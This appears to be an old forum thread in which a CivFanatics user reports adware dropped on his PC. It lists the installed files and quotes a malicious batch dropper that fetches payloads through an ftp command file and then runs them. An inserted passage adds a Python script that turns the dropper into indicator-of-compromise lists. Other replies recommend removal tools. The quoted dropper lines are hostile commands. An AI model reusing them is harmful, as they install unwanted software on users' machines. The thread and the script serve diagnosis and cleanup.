
Foistware from CFC?

scoutsout (Minstrel Boy) - Joined Dec 29, 2002 - 4,263 messages - Location: Check Six!
Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).

After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".

I found the following modifications to my system:

Running processes
loader
id53
pef

New desktop Icons:

Lycos Sidesearch
appears to be a browser hijack

0021-bdl94126.exe
No information given in "properties", but icon was a "setup" icon.

CS4P20.exe
Company Name: Clear Search
Product Name: Loader

"o"
No information given in "properties"

"o.bat"
Commands as follows:

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe

"infamous_downloader.exe",
No information given in "properties"

install2.exe
Company Name: TODO
Product Name: Spawner.exe

silent.exe
No information given in "properties"

New folder under c: "installer", with "id53.exe" in it
New folder under c: "temporary", with stcterms.html in it

New Windows Startup Items:
PowerReg Scheduler.exe
PowerRegSchedulerV3.exe

In c:\windows
"infamous.exe"

In the program files directory
New Folder "Lycos"
New programs "over.exe" and "pup.exe"

After cleaning all of this crap out and starting Internet Explorer, my browser was hijacked to the following:

http://default-homepage-network.com/start.cgi?hkcu

This morning I see we now have popup windows on the forums side of CFC. That really is too bad.
 
Would somebody please verify if the company propagating this popup is popping it up through CFC Forums? I mean, come on people, my wife thinks American Photographer is porn. I really don't need stuff like this when I'm trying to read a turnlog:

obnoxious_CFC_popup.jpg
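The o.bat quoted in the post is a plain batch dropper: when a marker path is absent it runs ftp with a command file, then it launches each payload that has landed on disk. The following is an added example, not code from the post or from CFC, that parses such a script into the files it fetches and runs, builds a first-cut IoC list from it, and cross-checks that list against the files the poster found on disk. The sample batch text and the observed-file list are constructed from the post; the function and class names are mine.

```python
"""Triage helper for a batch-file dropper of the `if exist X X` kind.

Added example (not from the original post). It records what such a script
tries to fetch and run, so the names can be compared with what turned up
on the machine.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Constructed sample: the six o.bat lines as quoted in the post above.
O_BAT = """\
if not exist C:\\WINDOWSstatuslog ftp -s:o
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"""

# Matches the batch idiom `if [not] exist <path> <command...>`.
IF_EXIST = re.compile(
    r"^\s*if\s+(?P<neg>not\s+)?exist\s+(?P<path>\S+)\s+(?P<cmd>.+?)\s*$",
    re.IGNORECASE,
)
# `ftp -s:<file>` runs the ftp commands stored in <file>; that file is the
# real download recipe and belongs on the IoC list.
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(?P<script>\S+)", re.IGNORECASE)


@dataclass
class DropperSummary:
    launched: List[str] = field(default_factory=list)     # payloads executed when present
    ftp_scripts: List[str] = field(default_factory=list)  # ftp command files used to fetch payloads
    sentinels: List[str] = field(default_factory=list)    # marker paths whose absence triggers a fetch


def parse_dropper(text: str) -> DropperSummary:
    """Walk a batch dropper line by line and record what it fetches and runs."""
    summary = DropperSummary()
    for line in text.splitlines():
        m = IF_EXIST.match(line)
        if not m:
            continue  # not an `if exist` guard; this example only tracks those
        path, cmd = m.group("path"), m.group("cmd")
        ftp = FTP_SCRIPT.match(cmd)
        if ftp:
            summary.ftp_scripts.append(ftp.group("script"))
            if m.group("neg"):
                summary.sentinels.append(path)
            continue
        # A guard of the form `if exist X X` launches X only once it has been dropped.
        first = cmd.split()[0]
        if first.lower() == path.lower() or first.lower().endswith(".exe"):
            summary.launched.append(first)
    return summary


def referenced_files(summary: DropperSummary) -> List[str]:
    """Every file name the dropper mentions, deduplicated case-insensitively."""
    seen, out = set(), []
    for name in summary.ftp_scripts + summary.launched + summary.sentinels:
        key = name.lower()
        if key not in seen:
            seen.add(key)
            out.append(name)
    return out


def missing_payloads(summary: DropperSummary, observed: Iterable[str]) -> List[str]:
    """Payloads the dropper expects to run that were not among the files seen on disk.

    Windows file names are case-insensitive, so compare lowercased. A name that
    never appeared may mean the fetch failed or the file was stored under another name.
    """
    have = {name.lower() for name in observed}
    return [name for name in summary.launched if name.lower() not in have]


# Constructed from the desktop icons, folders and c:\windows entries listed in the post.
OBSERVED_FILES = [
    "0021-bdl94126.exe", "CS4P20.exe", "o", "o.bat",
    "infamous_downloader.exe", "install2.exe", "silent.exe", "infamous.exe",
]

if __name__ == "__main__":
    s = parse_dropper(O_BAT)
    print("fetch recipe(s):", s.ftp_scripts)
    print("runs when present:", s.launched)
    print("IoC list:", referenced_files(s))
    print("expected but not seen:", missing_payloads(s, OBSERVED_FILES))
```

Run against the quoted o.bat, the parser reports one ftp command file ("o"), one marker path, and five payloads; cross-checking against the files listed in the post leaves CS4P028.exe as the one name the script expects that was not reported on disk, which is exactly the sort of discrepancy worth a second look during cleanup.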
 
You've probably got it from somewhere else if it's popping up whilst actually browsing the forum, since you should only get adverts on the main page.
 
We, at CFC, don't condone this. TF will surely raise a complaint with our site host, and ask them to remove it (if it's from here) - since we're a family-friendly site.
 
@XIII: Thank you. I can't ask any more than for someone in the know to check it out.

@Dell19: at the time that thing popped up, there were no suspicious processes running (Explorer, systray, rnapp, and one MSIE window, nothing else) and I was on CFC forums, reading a turnlog. I'm 99% sure I got rid of everything that was foisted. I have "forums.civfanatics.com" bookmarked, and that's usually the way I enter this site... because the main page has popups. All I can do is describe what I see going on...
 
I just scanned my computer and all I found were a bunch of tracking cookies. But on a semi different note no Red Serrif..... :confused:
 
I also should have mentioned - AdAware caught NONE of this stuff. Also - when I closed my browser earlier, I got a popup. I see three possibilities (someone please tell me if they see another):

1) Something still has my browser 'hooked' after the foistware routine.
2) there's a TSR process running that's invisible to the task manager
3) There's something in the scripts/code that make up the pages of the forums.

Believe it or not, I'm hoping it's #1.
 
Okay - the forums side seems to be behaving nicely from work... so that eliminates #3. I'm still fairly certain that the foistware came from a popup window off the main site (I surfed it a little last night too...) but at least the problem seems to be somewhat isolated.

@Dell - thanks for your interest/concern/help/advice... I appreciate it. I'll check back in here after I spend some time on my machine this evening.
 
When was the last time you rebooted before you visited CFC? Often, software like that doesn't start functioning until the computer reboots, as the instructions to install and run the programs are in the registry and autoexec files. There is some spyware that you might get from CFC, but none of it seems malignant like you are describing.
 
scoutsout,

i had the same thing a while back (popups from out of nowhere and other evilness). was sure it was CFC that was doing it. ran a couple of the ADaware and the like scanners. they cleaned off a couple things, but it was still happening.
SpyBot S&D found 3 more though, and after that it all stopped.

it seems to me that all these scanning/cleaning softwares don't have ALL the spyware/adware progs listed in them, so they don't always catch everything. try DLing another cleaner (spybot seems to be a good free one for me).

the fact that it's coming up during CFC browsing doesn't really mean anything.
if you want to run a clean test, try rebooting your machine then going to like MSN.com or CNN or something and leaving it there overnight, see if the popups come around again. if they do, it's not cfc, it's another adware/spyware on your system that your cleaner software didn't find and doesn't know about (you have updated it right?)
 
Download hijackthis from that site. Their forum also has some very useful information.
 
Some spyware...that's an understatement :lol:

My advice:

www.spybot.info <-- Spybot Search and Destroy
combined with adaware (remember to configure adaware to do a deepscan + search compressed archives)
www.trendmicro - use housecall if you don't have your own virus scanner. I use Trendmicro's internet security, which also detects malware and spyware - so I reckon their free tool Housecall will also do that.

Configure IE to ask you before accepting cookies - that may not do much, but afaik it provides at least some benefit.
http://www.javacoolsoftware.com/spywareblaster.html is another good tool to combat spyware
also try the spywareguard from the same company (check under the download section)

Also - remember that some malware is more harmless than others: I recently removed a trojan from a friend's computer "small.5" which does not deliver a destructive payload, but hangs the computer. I removed the running process, and manually deleted the program - then the machine showed no infections ;)
 
Probably, although they may not all be exactly the same problem, as only a few posters seem to suffer from this.
 
At the risk of sounding argumentative, we know that only a few posters are posting about this. We don't know that only a few posters are suffering from this. Two similar threads started on the same day sounds a little suspicious to me.

And I just remembered that this machine I'm on now has a different OS and some different software that makes it a little harder for me to have foistware downloaded to this machine without my explicit consent.

@Roddy (and others) Got Spybot. Thanks!
 
You might be correct but two is only one more than one so both possibilities have a reasonable chance of being correct at the moment. Another thing that might be helping me is that I am behind a university firewall.
 
Well, how about three people then? This afternoon, just as I was entering the CFC website, my anti-virus software popped up with an alert notification. Something along these lines (from my logfile)...

Action: File Deleted
Infection: HTML.MHTMLRedir.Exploit
Infection Type: Trojan

I think Thunderfall's host is feeding him some bad pop-ups.
 